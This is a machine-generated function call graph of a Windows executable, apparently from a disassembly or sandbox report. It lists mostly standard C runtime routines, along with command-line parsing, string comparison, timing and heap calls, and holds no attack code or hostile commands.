22a1c0 15531->15532 15532->15529 15533 229f9e _parse_cmdline 76 API calls 15532->15533 15533->15529 15535 229ec6 15534->15535 15537 229ecb _strlen 15534->15537 15536 22ca40 ___initmbctable 94 API calls 15535->15536 15536->15537 15538 22dc24 __calloc_crt 66 API calls 15537->15538 15541 229ed9 15537->15541 15543 229f00 _strlen 15538->15543 15539 229f4f 15540 22c318 _free 66 API calls 15539->15540 15540->15541 15541->15455 15542 22dc24 __calloc_crt 66 API calls 15542->15543 15543->15539 15543->15541 15543->15542 15544 229f75 15543->15544 15547 229f8c 15543->15547 16359 22db76 15543->16359 15545 22c318 _free 66 API calls 15544->15545 15545->15541 15548 22afa1 __invoke_watson 10 API calls 15547->15548 15550 229f98 15548->15550 15549 22db59 _parse_cmdline 76 API calls 15549->15550 15550->15549 15552 22a02a 15550->15552 15551 22a128 15551->15455 15552->15551 15553 22db59 76 API calls _parse_cmdline 15552->15553 15553->15552 15555 229899 __IsNonwritableInCurrentImage 15554->15555 16368 22d5c5 15555->16368 15557 2298b7 __initterm_e 15559 2298d8 __IsNonwritableInCurrentImage 15557->15559 16371 22d5a9 15557->16371 15559->15459 15561 229e67 15560->15561 15562 229e6c 15560->15562 15563 22ca40 ___initmbctable 94 API calls 15561->15563 15564 229152 15562->15564 15565 22db59 _parse_cmdline 76 API calls 15562->15565 15563->15562 15566 2159a6 GetModuleHandleW 15564->15566 15565->15562 16436 216c5c GetCommandLineW CommandLineToArgvW 15566->16436 15568 215abf 15572 215ae3 15568->15572 15620 2159fe 15568->15620 16461 218417 15568->16461 15571 215bc5 16611 2168fb 15571->16611 16470 2160af 15572->16470 15576 2159f8 _memset _wcsrchr 15576->15568 15578 22921c _wcslwr_s_l_stat 66 API calls 15576->15578 15576->15620 15582 215a50 PathRemoveExtensionW 15578->15582 15579 215bd4 16626 21a414 15579->16626 15580 215bd9 15589 215be3 15580->15589 16636 216463 15580->16636 16590 22de40 15582->16590 15588 215c07 16680 2184c7 GetLocalTime 15588->16680 15589->15588 16647 215cda 15589->16647 15599 215b60 #17 GetTickCount 16500 21621f GetProcessHeap HeapAlloc 15599->16500 15601 215c39 15605 215c4d 15601->15605 16694 218e6f GetProcessHeap HeapFree 15601->16694 15603 2184c7 118 API calls 15603->15601 15608 215c6b 15605->15608 15609 215c5d CloseHandle 15605->15609 15606 215b90 GetTickCount 16536 215945 15606->16536 15610 215c7a 15608->15610 15612 218e6f 3 API calls 15608->15612 15609->15608 15613 215c8f 15610->15613 15615 218e6f 3 API calls 15610->15615 15612->15610 15616 215c9e 15613->15616 15617 218e6f 3 API calls 15613->15617 15614 215b99 15614->15571 16548 215e0b 15614->16548 15615->15613 15618 215cad 15616->15618 15621 218e6f 3 API calls 15616->15621 15617->15616 15622 2291d5 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 15618->15622 15620->15571 16603 21854a 15620->16603 15621->15618 15623 215ccf 15622->15623 15623->15466 15639 229a6c 15623->15639 15625 229034 15624->15625 15626 229039 15624->15626 15627 229ccc __FF_MSGBANNER 66 API calls 15625->15627 15628 229b18 __NMSG_WRITE 66 API calls 15626->15628 15627->15626 15629 229041 15628->15629 15630 2297f1 _doexit 3 API calls 15629->15630 15631 22904b 15630->15631 15631->15437 15633 229ccc __FF_MSGBANNER 66 API calls 15632->15633 15634 229ad4 15633->15634 15635 229b18 __NMSG_WRITE 66 API calls 15634->15635 15636 229adc 15635->15636 18701 229a87 15636->18701 15640 229927 _doexit 66 API calls 15639->15640 15641 229a7d 15640->15641 15641->15466 15643 229927 _doexit 66 API calls 15642->15643 15644 229aad 15643->15644 15644->15469 15646 22a5e4 _DecodePointerInternal 15645->15646 15647 22a5f3 15645->15647 15646->15647 15648 22a612 15647->15648 15649 22a604 TlsFree 15647->15649 15650 22d09a DeleteCriticalSection 15648->15650 15652 22d0b2 15648->15652 15649->15648 15683 22c318 15650->15683 15653 22d0c4 DeleteCriticalSection 15652->15653 15654 22a932 15652->15654 15653->15652 15654->15440 15709 22a539 _EncodePointerInternal 15655->15709 15657 229832 __init_pointers __initp_misc_winsig 15710 22d019 _EncodePointerInternal 15657->15710 15659 229858 _EncodePointerInternal _EncodePointerInternal _EncodePointerInternal _EncodePointerInternal 15660 22d02f 15659->15660 15661 22d03a 15660->15661 15662 22d044 InitializeCriticalSectionAndSpinCount 15661->15662 15663 22aa23 15661->15663 15662->15661 15662->15663 15663->15486 15663->15487 15665 22dc2d 15664->15665 15667 22aa52 15665->15667 15668 22dc4b Sleep 15665->15668 15711 231603 15665->15711 15667->15487 15667->15492 15669 22dc60 15668->15669 15669->15665 15669->15667 15722 22aac0 15670->15722 15672 22a628 GetModuleHandleW 15723 22d1bd 15672->15723 15674 22a666 InterlockedIncrement 15730 22a6be 15674->15730 15677 22d1bd __lock 64 API calls 15678 22a687 15677->15678 15733 22ca63 InterlockedIncrement 15678->15733 15680 22a6a5 15745 22a6c7 15680->15745 15682 22a6b2 __commit 15682->15496 15684 22c323 HeapFree 15683->15684 15685 22c34c __dosmaperr 15683->15685 15684->15685 15686 22c338 15684->15686 15685->15648 15689 22b059 15686->15689 15692 22a6d5 GetLastError 15689->15692 15691 22b05e GetLastError 15691->15685 15706 22a57f TlsGetValue 15692->15706 15695 22a742 SetLastError 15695->15691 15696 22dc24 __calloc_crt 62 API calls 15697 22a700 15696->15697 15697->15695 15698 22a708 _DecodePointerInternal 15697->15698 15699 22a71d 15698->15699 15700 22a721 15699->15700 15701 22a739 15699->15701 15702 22a61c __getptd_noexit 62 API calls 15700->15702 15703 22c318 _free 62 API calls 15701->15703 15704 22a729 GetCurrentThreadId 15702->15704 15705 22a73f 15703->15705 15704->15695 15705->15695 15707 22a594 _DecodePointerInternal TlsSetValue 15706->15707 15708 22a5af 15706->15708 15707->15708 15708->15695 15708->15696 15709->15657 15710->15659 15712 23160f 15711->15712 15718 23162a 15711->15718 15713 23161b 15712->15713 15712->15718 15714 22b059 __commit 65 API calls 15713->15714 15716 231620 15714->15716 15715 23163d RtlAllocateHeap 15717 231664 15715->15717 15715->15718 15716->15665 15717->15665 15718->15715 15718->15717 15720 22d44a _DecodePointerInternal 15718->15720 15721 22d45f 15720->15721 15721->15718 15722->15672 15724 22d1d2 15723->15724 15725 22d1e5 EnterCriticalSection 15723->15725 15748 22d0f6 15724->15748 15725->15674 15727 22d1d8 15727->15725 15728 229aca __amsg_exit 65 API calls 15727->15728 15729 22d1e4 15728->15729 15729->15725 15910 22d0da LeaveCriticalSection 15730->15910 15732 22a680 15732->15677 15734 22ca81 InterlockedIncrement 15733->15734 15735 22ca84 15733->15735 15734->15735 15736 22ca91 15735->15736 15737 22ca8e InterlockedIncrement 15735->15737 15738 22ca9b InterlockedIncrement 15736->15738 15739 22ca9e 15736->15739 15737->15736 15738->15739 15740 22caa8 InterlockedIncrement 15739->15740 15741 22caab 15739->15741 15740->15741 15742 22cac4 InterlockedIncrement 15741->15742 15743 22cad4 InterlockedIncrement 15741->15743 15744 22cadf InterlockedIncrement 15741->15744 15742->15741 15743->15741 15744->15680 15911 22d0da LeaveCriticalSection 15745->15911 15747 22a6ce 15747->15682 15749 22d102 __commit 15748->15749 15751 22d128 15749->15751 15773 229ccc 15749->15773 15758 22d138 __commit 15751->15758 15809 22dbda 15751->15809 15756 22d14a 15760 22b059 __commit 65 API calls 15756->15760 15757 22d159 15761 22d1bd __lock 65 API calls 15757->15761 15758->15727 15760->15758 15763 22d160 15761->15763 15764 22d193 15763->15764 15765 22d168 InitializeCriticalSectionAndSpinCount 15763->15765 15766 22c318 _free 65 API calls 15764->15766 15767 22d178 15765->15767 15768 22d184 15765->15768 15766->15768 15769 22c318 _free 65 API calls 15767->15769 15815 22d1af 15768->15815 15771 22d17e 15769->15771 15772 22b059 __commit 65 API calls 15771->15772 15772->15768 15818 22dabd 15773->15818 15775 229cd3 15776 229ce0 15775->15776 15777 22dabd __NMSG_WRITE 66 API calls 15775->15777 15778 229b18 __NMSG_WRITE 66 API calls 15776->15778 15780 229d02 15776->15780 15777->15776 15779 229cf8 15778->15779 15781 229b18 __NMSG_WRITE 66 API calls 15779->15781 15782 229b18 15780->15782 15781->15780 15783 229b39 __NMSG_WRITE 15782->15783 15785 22dabd __NMSG_WRITE 63 API calls 15783->15785 15805 229c55 15783->15805 15787 229b53 15785->15787 15786 229cc5 15806 2297f1 15786->15806 15788 229c64 GetStdHandle 15787->15788 15789 22dabd __NMSG_WRITE 63 API calls 15787->15789 15790 229c72 _strlen 15788->15790 15788->15805 15791 229b64 15789->15791 15794 229ca8 WriteFile 15790->15794 15790->15805 15791->15788 15792 229b76 15791->15792 15792->15805 15843 22921c 15792->15843 15794->15805 15796 229ba2 GetModuleFileNameW 15797 229bc3 15796->15797 15801 229bcf _wcslen 15796->15801 15798 22921c _wcslwr_s_l_stat 63 API calls 15797->15798 15798->15801 15799 22afa1 __invoke_watson 10 API calls 15799->15801 15800 22d951 63 API calls __NMSG_WRITE 15800->15801 15801->15799 15801->15800 15803 229c45 15801->15803 15852 22d9cb 15801->15852 15861 22d7e0 15803->15861 15879 2291d5 15805->15879 15889 2297c1 GetModuleHandleW 15806->15889 15811 22dbe3 15809->15811 15812 22d143 15811->15812 15813 22dbfa Sleep 15811->15813 15892 22cdb5 15811->15892 15812->15756 15812->15757 15814 22dc0f 15813->15814 15814->15811 15814->15812 15909 22d0da LeaveCriticalSection 15815->15909 15817 22d1b6 15817->15758 15819 22dac9 15818->15819 15820 22b059 __commit 66 API calls 15819->15820 15822 22dad3 15819->15822 15821 22daec 15820->15821 15825 22affd 15821->15825 15822->15775 15828 22afcb _DecodePointerInternal 15825->15828 15829 22afe0 15828->15829 15834 22afa1 15829->15834 15831 22aff7 15832 22afcb __commit 10 API calls 15831->15832 15833 22b009 15832->15833 15833->15775 15837 22ae73 15834->15837 15838 22ae92 _memset __call_reportfault 15837->15838 15839 22aeb0 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 15838->15839 15840 22af7e __call_reportfault 15839->15840 15841 2291d5 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 15840->15841 15842 22af9a GetCurrentProcess TerminateProcess 15841->15842 15842->15831 15844 229231 15843->15844 15845 22922a 15843->15845 15846 22b059 __commit 66 API calls 15844->15846 15845->15844 15849 229252 15845->15849 15851 229236 15846->15851 15847 22affd __commit 11 API calls 15848 229240 15847->15848 15848->15796 15848->15801 15849->15848 15850 22b059 __commit 66 API calls 15849->15850 15850->15851 15851->15847 15855 22d9dd 15852->15855 15853 22d9e1 15854 22b059 __commit 66 API calls 15853->15854 15856 22d9e6 15853->15856 15860 22d9fd 15854->15860 15855->15853 15855->15856 15857 22da24 15855->15857 15856->15801 15857->15856 15859 22b059 __commit 66 API calls 15857->15859 15858 22affd __commit 11 API calls 15858->15856 15859->15860 15860->15858 15887 22a539 _EncodePointerInternal 15861->15887 15863 22d806 15864 22d893 15863->15864 15865 22d816 LoadLibraryW 15863->15865 15870 22d8ad _DecodePointerInternal _DecodePointerInternal 15864->15870 15876 22d8c0 15864->15876 15866 22d82b GetProcAddress 15865->15866 15874 22d92b 15865->15874 15869 22d841 7 API calls 15866->15869 15866->15874 15867 22d8f6 _DecodePointerInternal 15868 22d91f _DecodePointerInternal 15867->15868 15875 22d8fd 15867->15875 15868->15874 15869->15864 15872 22d883 GetProcAddress _EncodePointerInternal 15869->15872 15870->15876 15871 2291d5 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 15873 22d94a 15871->15873 15872->15864 15873->15805 15874->15871 15875->15868 15877 22d910 _DecodePointerInternal 15875->15877 15876->15867 15876->15868 15878 22d8e3 15876->15878 15877->15868 15877->15878 15878->15868 15880 2291df IsDebuggerPresent 15879->15880 15881 2291dd 15879->15881 15888 22de27 15880->15888 15881->15786 15884 22ae21 SetUnhandledExceptionFilter UnhandledExceptionFilter 15885 22ae46 GetCurrentProcess TerminateProcess 15884->15885 15886 22ae3e __call_reportfault 15884->15886 15885->15786 15886->15885 15887->15863 15888->15884 15890 2297d5 GetProcAddress 15889->15890 15891 2297e5 ExitProcess 15889->15891 15890->15891 15893 22ce32 15892->15893 15898 22cdc3 15892->15898 15894 22d44a _malloc _DecodePointerInternal 15893->15894 15896 22ce38 15894->15896 15895 22cdce 15897 229ccc __FF_MSGBANNER 65 API calls 15895->15897 15895->15898 15901 229b18 __NMSG_WRITE 65 API calls 15895->15901 15906 2297f1 _doexit 3 API calls 15895->15906 15899 22b059 __commit 65 API calls 15896->15899 15897->15895 15898->15895 15900 22cdf1 RtlAllocateHeap 15898->15900 15903 22ce1e 15898->15903 15904 22d44a _malloc _DecodePointerInternal 15898->15904 15907 22ce1c 15898->15907 15902 22ce2a 15899->15902 15900->15898 15900->15902 15901->15895 15902->15811 15905 22b059 __commit 65 API calls 15903->15905 15904->15898 15905->15907 15906->15895 15908 22b059 __commit 65 API calls 15907->15908 15908->15902 15909->15817 15910->15732 15911->15747 15914 229fbd 15912->15914 15916 22a02a 15914->15916 15922 22db59 15914->15922 15915 22a128 15915->15529 15915->15531 15916->15915 15917 22db59 76 API calls _parse_cmdline 15916->15917 15917->15916 15919 22ca49 15918->15919 15921 22ca50 15918->15921 16246 22c8a1 15919->16246 15921->15525 15925 22db01 15922->15925 15928 2292e9 15925->15928 15929 229349 15928->15929 15930 2292fc 15928->15930 15929->15914 15936 22a753 15930->15936 15933 229329 15933->15929 15956 22c589 15933->15956 15937 22a6d5 __getptd_noexit 66 API calls 15936->15937 15938 22a75b 15937->15938 15939 229301 15938->15939 15940 229aca __amsg_exit 66 API calls 15938->15940 15939->15933 15941 22cd37 15939->15941 15940->15939 15942 22cd43 __commit 15941->15942 15943 22a753 __getptd 66 API calls 15942->15943 15944 22cd48 15943->15944 15945 22cd76 15944->15945 15946 22cd5a 15944->15946 15947 22d1bd __lock 66 API calls 15945->15947 15948 22a753 __getptd 66 API calls 15946->15948 15949 22cd7d 15947->15949 15950 22cd5f 15948->15950 15972 22cce5 15949->15972 15953 22cd6d __commit 15950->15953 15955 229aca __amsg_exit 66 API calls 15950->15955 15953->15933 15955->15953 15957 22c595 __commit 15956->15957 15958 22a753 __getptd 66 API calls 15957->15958 15959 22c59a 15958->15959 15960 22d1bd __lock 66 API calls 15959->15960 15968 22c5ac 15959->15968 15961 22c5ca 15960->15961 15962 22c613 15961->15962 15963 22c5e1 InterlockedDecrement 15961->15963 15964 22c5fb InterlockedIncrement 15961->15964 16242 22c624 15962->16242 15963->15964 15967 22c5ec 15963->15967 15964->15962 15966 229aca __amsg_exit 66 API calls 15969 22c5ba __commit 15966->15969 15967->15964 15970 22c318 _free 66 API calls 15967->15970 15968->15966 15968->15969 15969->15929 15971 22c5fa 15970->15971 15971->15964 15973 22ccf2 15972->15973 15979 22cd27 15972->15979 15974 22ca63 ___addlocaleref 8 API calls 15973->15974 15973->15979 15975 22cd08 15974->15975 15975->15979 15983 22caf7 15975->15983 15980 22cda4 15979->15980 16241 22d0da LeaveCriticalSection 15980->16241 15982 22cdab 15982->15950 15984 22cb8b 15983->15984 15985 22cb08 InterlockedDecrement 15983->15985 15984->15979 15997 22cb95 15984->15997 15986 22cb20 15985->15986 15987 22cb1d InterlockedDecrement 15985->15987 15988 22cb2a InterlockedDecrement 15986->15988 15989 22cb2d 15986->15989 15987->15986 15988->15989 15990 22cb37 InterlockedDecrement 15989->15990 15991 22cb3a 15989->15991 15990->15991 15992 22cb44 InterlockedDecrement 15991->15992 15993 22cb47 15991->15993 15992->15993 15994 22cb60 InterlockedDecrement 15993->15994 15995 22cb7b InterlockedDecrement 15993->15995 15996 22cb70 InterlockedDecrement 15993->15996 15994->15993 15995->15984 15996->15993 15998 22cc19 15997->15998 16006 22cbac 15997->16006 15999 22c318 _free 66 API calls 15998->15999 16026 22cc66 15998->16026 16000 22cc3a 15999->16000 16003 22c318 _free 66 API calls 16000->16003 16002 22cbe0 16004 22cc01 16002->16004 16016 22c318 _free 66 API calls 16002->16016 16007 22cc4d 16003->16007 16009 22c318 _free 66 API calls 16004->16009 16006->15998 16006->16002 16012 22c318 _free 66 API calls 16006->16012 16015 22c318 _free 66 API calls 16007->16015 16008 22cc8f 16010 22ccd4 16008->16010 16022 22c318 66 API calls _free 16008->16022 16017 22cc0e 16009->16017 16013 22c318 _free 66 API calls 16010->16013 16011 22c318 _free 66 API calls 16011->16008 16014 22cbd5 16012->16014 16018 22ccda 16013->16018 16027 230ebb 16014->16027 16020 22cc5b 16015->16020 16021 22cbf6 16016->16021 16023 22c318 _free 66 API calls 16017->16023 16018->15979 16024 22c318 _free 66 API calls 16020->16024 16055 230e4d 16021->16055 16022->16008 16023->15998 16024->16026 16026->16008 16067 230ad1 16026->16067 16028 230ecc 16027->16028 16054 230fb5 16027->16054 16029 230edd 16028->16029 16030 22c318 _free 66 API calls 16028->16030 16031 230eef 16029->16031 16032 22c318 _free 66 API calls 16029->16032 16030->16029 16033 230f01 16031->16033 16034 22c318 _free 66 API calls 16031->16034 16032->16031 16035 230f13 16033->16035 16036 22c318 _free 66 API calls 16033->16036 16034->16033 16037 230f25 16035->16037 16038 22c318 _free 66 API calls 16035->16038 16036->16035 16039 230f37 16037->16039 16040 22c318 _free 66 API calls 16037->16040 16038->16037 16041 230f49 16039->16041 16042 22c318 _free 66 API calls 16039->16042 16040->16039 16043 230f5b 16041->16043 16044 22c318 _free 66 API calls 16041->16044 16042->16041 16045 230f6d 16043->16045 16046 22c318 _free 66 API calls 16043->16046 16044->16043 16047 22c318 _free 66 API calls 16045->16047 16048 230f7f 16045->16048 16046->16045 16047->16048 16049 22c318 _free 66 API calls 16048->16049 16051 230f91 16048->16051 16049->16051 16050 230fa3 16053 22c318 _free 66 API calls 16050->16053 16050->16054 16051->16050 16052 22c318 _free 66 API calls 16051->16052 16052->16050 16053->16054 16054->16002 16056 230e5a 16055->16056 16066 230eb2 16055->16066 16057 230e6a 16056->16057 16059 22c318 _free 66 API calls 16056->16059 16058 230e7c 16057->16058 16060 22c318 _free 66 API calls 16057->16060 16061 230e8e 16058->16061 16062 22c318 _free 66 API calls 16058->16062 16059->16057 16060->16058 16063 22c318 _free 66 API calls 16061->16063 16064 230ea0 16061->16064 16062->16061 16063->16064 16065 22c318 _free 66 API calls 16064->16065 16064->16066 16065->16066 16066->16004 16068 230ae2 16067->16068 16240 22cc84 16067->16240 16069 22c318 _free 66 API calls 16068->16069 16070 230aea 16069->16070 16071 22c318 _free 66 API calls 16070->16071 16072 230af2 16071->16072 16073 22c318 _free 66 API calls 16072->16073 16074 230afa 16073->16074 16075 22c318 _free 66 API calls 16074->16075 16076 230b02 16075->16076 16077 22c318 _free 66 API calls 16076->16077 16078 230b0a 16077->16078 16079 22c318 _free 66 API calls 16078->16079 16080 230b12 16079->16080 16081 22c318 _free 66 API calls 16080->16081 16082 230b19 16081->16082 16083 22c318 _free 66 API calls 16082->16083 16084 230b21 16083->16084 16085 22c318 _free 66 API calls 16084->16085 16086 230b29 16085->16086 16087 22c318 _free 66 API calls 16086->16087 16088 230b31 16087->16088 16089 22c318 _free 66 API calls 16088->16089 16090 230b39 16089->16090 16091 22c318 _free 66 API calls 16090->16091 16092 230b41 16091->16092 16093 22c318 _free 66 API calls 16092->16093 16094 230b49 16093->16094 16095 22c318 _free 66 API calls 16094->16095 16096 230b51 16095->16096 16097 22c318 _free 66 API calls 16096->16097 16098 230b59 16097->16098 16099 22c318 _free 66 API calls 16098->16099 16100 230b61 16099->16100 16101 22c318 _free 66 API calls 16100->16101 16102 230b6c 16101->16102 16103 22c318 _free 66 API calls 16102->16103 16104 230b74 16103->16104 16105 22c318 _free 66 API calls 16104->16105 16106 230b7c 16105->16106 16107 22c318 _free 66 API calls 16106->16107 16108 230b84 16107->16108 16109 22c318 _free 66 API calls 16108->16109 16110 230b8c 16109->16110 16111 22c318 _free 66 API calls 16110->16111 16112 230b94 16111->16112 16113 22c318 _free 66 API calls 16112->16113 16114 230b9c 16113->16114 16115 22c318 _free 66 API calls 16114->16115 16240->16011 16241->15982 16245 22d0da LeaveCriticalSection 16242->16245 16244 22c62b 16244->15968 16245->16244 16247 22c8ad __commit 16246->16247 16248 22a753 __getptd 66 API calls 16247->16248 16249 22c8b6 16248->16249 16250 22c589 __setmbcp 68 API calls 16249->16250 16251 22c8c0 16250->16251 16277 22c632 16251->16277 16254 22dbda __malloc_crt 66 API calls 16255 22c8e1 16254->16255 16256 22ca00 __commit 16255->16256 16284 22c6b3 16255->16284 16256->15921 16259 22c911 InterlockedDecrement 16260 22c932 InterlockedIncrement 16259->16260 16261 22c921 16259->16261 16260->16256 16264 22c948 16260->16264 16261->16260 16267 22c318 _free 66 API calls 16261->16267 16262 22ca20 16266 22b059 __commit 66 API calls 16262->16266 16263 22ca0d 16263->16256 16263->16262 16265 22c318 _free 66 API calls 16263->16265 16264->16256 16269 22d1bd __lock 66 API calls 16264->16269 16265->16262 16266->16256 16268 22c931 16267->16268 16268->16260 16271 22c95c InterlockedDecrement 16269->16271 16272 22c9eb InterlockedIncrement 16271->16272 16273 22c9d8 16271->16273 16294 22ca02 16272->16294 16273->16272 16275 22c318 _free 66 API calls 16273->16275 16276 22c9ea 16275->16276 16276->16272 16278 2292e9 _LocaleUpdate::_LocaleUpdate 76 API calls 16277->16278 16279 22c646 16278->16279 16280 22c651 GetOEMCP 16279->16280 16281 22c66f 16279->16281 16283 22c661 16280->16283 16282 22c674 GetACP 16281->16282 16281->16283 16282->16283 16283->16254 16283->16256 16285 22c632 getSystemCP 78 API calls 16284->16285 16286 22c6d3 16285->16286 16287 22c6de setSBCS 16286->16287 16289 22c722 IsValidCodePage 16286->16289 16292 22c747 _memset __setmbcp_nolock 16286->16292 16288 2291d5 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 16287->16288 16290 22c89a 16288->16290 16289->16287 16291 22c734 GetCPInfo 16289->16291 16290->16259 16290->16263 16291->16287 16291->16292 16297 22c3f4 GetCPInfo 16292->16297 16358 22d0da LeaveCriticalSection 16294->16358 16296 22ca09 16296->16256 16298 22c4dc 16297->16298 16300 22c428 _memset 16297->16300 16303 2291d5 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 16298->16303 16307 230a8c 16300->16307 16305 22c582 16303->16305 16305->16292 16306 230955 ___crtLCMapStringA 82 API calls 16306->16298 16308 2292e9 _LocaleUpdate::_LocaleUpdate 76 API calls 16307->16308 16309 230a9f 16308->16309 16317 2309a0 16309->16317 16312 230955 16313 2292e9 _LocaleUpdate::_LocaleUpdate 76 API calls 16312->16313 16314 230968 16313->16314 16334 230769 16314->16334 16318 2309c9 MultiByteToWideChar 16317->16318 16319 2309be 16317->16319 16322 2309f6 16318->16322 16329 2309f2 16318->16329 16319->16318 16320 230a0b _wcslwr_s_l_stat _memset 16325 230a44 MultiByteToWideChar 16320->16325 16320->16329 16321 2291d5 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 16323 22c497 16321->16323 16322->16320 16324 22cdb5 _malloc 66 API calls 16322->16324 16323->16312 16324->16320 16326 230a6b 16325->16326 16327 230a5a GetStringTypeW 16325->16327 16330 2292c4 16326->16330 16327->16326 16329->16321 16331 2292e1 16330->16331 16332 2292d0 16330->16332 16331->16329 16332->16331 16333 22c318 _free 66 API calls 16332->16333 16333->16331 16336 230787 MultiByteToWideChar 16334->16336 16337 2307e5 16336->16337 16341 2307ec 16336->16341 16338 2291d5 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 16337->16338 16340 22c4b7 16338->16340 16339 230839 MultiByteToWideChar 16342 230931 16339->16342 16343 230852 LCMapStringW 16339->16343 16340->16306 16344 22cdb5 _malloc 66 API calls 16341->16344 16348 230805 _wcslwr_s_l_stat 16341->16348 16345 2292c4 __freea 66 API calls 16342->16345 16343->16342 16346 230871 16343->16346 16344->16348 16345->16337 16347 23087b 16346->16347 16351 2308a4 16346->16351 16347->16342 16349 23088f LCMapStringW 16347->16349 16348->16337 16348->16339 16349->16342 16350 2308f3 LCMapStringW 16353 23092b 16350->16353 16354 230909 WideCharToMultiByte 16350->16354 16352 22cdb5 _malloc 66 API calls 16351->16352 16355 2308bf _wcslwr_s_l_stat 16351->16355 16352->16355 16356 2292c4 __freea 66 API calls 16353->16356 16354->16353 16355->16342 16355->16350 16356->16342 16358->16296 16360 22db84 16359->16360 16361 22db8b 16359->16361 16360->16361 16366 22dba9 16360->16366 16362 22b059 __commit 66 API calls 16361->16362 16363 22db90 16362->16363 16364 22affd __commit 11 API calls 16363->16364 16365 22db9a 16364->16365 16365->15543 16366->16365 16367 22b059 __commit 66 API calls 16366->16367 16367->16363 16369 22d5cb _EncodePointerInternal 16368->16369 16369->16369 16370 22d5e5 16369->16370 16370->15557 16374 22d568 16371->16374 16373 22d5b6 16373->15559 16375 22d574 __commit 16374->16375 16382 22980e 16375->16382 16381 22d595 __commit 16381->16373 16383 22d1bd __lock 66 API calls 16382->16383 16384 229815 16383->16384 16385 22d477 _DecodePointerInternal _DecodePointerInternal 16384->16385 16386 22d526 16385->16386 16387 22d4a5 16385->16387 16396 22d59e 16386->16396 16387->16386 16399 2315bd 16387->16399 16389 22d509 _EncodePointerInternal _EncodePointerInternal 16389->16386 16390 22d4b7 16390->16389 16391 22d4db 16390->16391 16406 22dc75 16390->16406 16391->16386 16393 22dc75 __realloc_crt 70 API calls 16391->16393 16394 22d4f7 _EncodePointerInternal 16391->16394 16395 22d4f1 16393->16395 16394->16389 16395->16386 16395->16394 16432 22981c 16396->16432 16400 2315c8 16399->16400 16401 2315dd HeapSize 16399->16401 16402 22b059 __commit 66 API calls 16400->16402 16401->16390 16403 2315cd 16402->16403 16404 22affd __commit 11 API calls 16403->16404 16405 2315d8 16404->16405 16405->16390 16408 22dc7e 16406->16408 16409 22dcbd 16408->16409 16410 22dc9e Sleep 16408->16410 16411 23168a 16408->16411 16409->16391 16410->16408 16412 2316a0 16411->16412 16413 231695 16411->16413 16415 2316a8 16412->16415 16424 2316b5 16412->16424 16414 22cdb5 _malloc 66 API calls 16413->16414 16416 23169d 16414->16416 16417 22c318 _free 66 API calls 16415->16417 16416->16408 16431 2316b0 __dosmaperr 16417->16431 16418 2316ed 16419 22d44a _malloc _DecodePointerInternal 16418->16419 16421 2316f3 16419->16421 16420 2316bd HeapReAlloc 16420->16424 16420->16431 16422 22b059 __commit 66 API calls 16421->16422 16422->16431 16423 23171d 16426 22b059 __commit 66 API calls 16423->16426 16424->16418 16424->16420 16424->16423 16425 22d44a _malloc _DecodePointerInternal 16424->16425 16428 231705 16424->16428 16425->16424 16427 231722 GetLastError 16426->16427 16427->16431 16429 22b059 __commit 66 API calls 16428->16429 16430 23170a GetLastError 16429->16430 16430->16431 16431->16408 16435 22d0da LeaveCriticalSection 16432->16435 16434 229823 16434->16381 16435->16434 16437 216c91 GetLastError 16436->16437 16451 216cc4 16436->16451 16438 216c9d 16437->16438 16442 21854a 118 API calls 16438->16442 16439 216e70 16440 216e90 LocalFree 16439->16440 16698 2199d2 16439->16698 16447 216cbd 16440->16447 16442->16447 16443 216cf5 lstrlenW 16445 216d01 CompareStringW 16443->16445 16446 216d3e lstrlenW 16443->16446 16444 216d34 16444->16440 16457 21854a 118 API calls 16444->16457 16445->16446 16445->16451 16448 216d4b CompareStringW 16446->16448 16449 216d8e lstrlenW 16446->16449 16447->15576 16448->16449 16448->16451 16452 216ddb lstrlenW 16449->16452 16453 216d9b CompareStringW 16449->16453 16450 218889 7 API calls 16450->16451 16451->16439 16451->16443 16451->16444 16451->16450 16455 216e08 lstrlenW 16452->16455 16456 216de8 CompareStringW 16452->16456 16453->16451 16453->16452 16458 216e32 lstrlenW 16455->16458 16459 216e15 CompareStringW 16455->16459 16456->16451 16456->16455 16457->16440 16458->16451 16460 216e3f CompareStringW 16458->16460 16459->16451 16459->16458 16460->16451 16711 219ca3 16461->16711 16464 218450 16466 218889 7 API calls 16464->16466 16467 218480 16464->16467 16465 218444 GetLastError 16465->16464 16468 21846f 16466->16468 16467->15572 16468->16467 16718 2185b2 16468->16718 16773 219cfe 16470->16773 16473 21854a 118 API calls 16474 215af6 16473->16474 16474->15620 16475 216123 16474->16475 16476 2161e5 16475->16476 16477 21614a 16475->16477 16479 215b19 16476->16479 16482 21a46e 12 API calls 16476->16482 16480 216204 16477->16480 16481 21616d 16477->16481 16809 219dc6 16477->16809 16479->15620 16488 216ef5 16479->16488 16484 21854a 118 API calls 16480->16484 16481->16477 16485 21620b 16481->16485 16487 2161e2 16481->16487 16829 219ef3 16481->16829 16833 21a46e 16481->16833 16482->16479 16484->16476 16485->16480 16487->16476 16922 216f5c 16488->16922 16491 216f0f 16494 21854a 118 API calls 16491->16494 16499 215b53 16494->16499 16495 216f35 16954 217c12 16495->16954 16498 2184c7 118 API calls 16498->16499 16499->15599 16499->15620 16501 216251 16500->16501 16510 216260 16500->16510 16505 21854a 118 API calls 16501->16505 16518 2163fa 16501->16518 16502 2162fd 16503 216353 16502->16503 16504 216307 GetProcessHeap HeapAlloc 16502->16504 17313 21676f 16503->17313 16504->16503 16508 216330 16504->16508 16534 2163f3 16505->16534 16507 219dc6 52 API calls 16507->16510 16508->16501 16510->16501 16510->16502 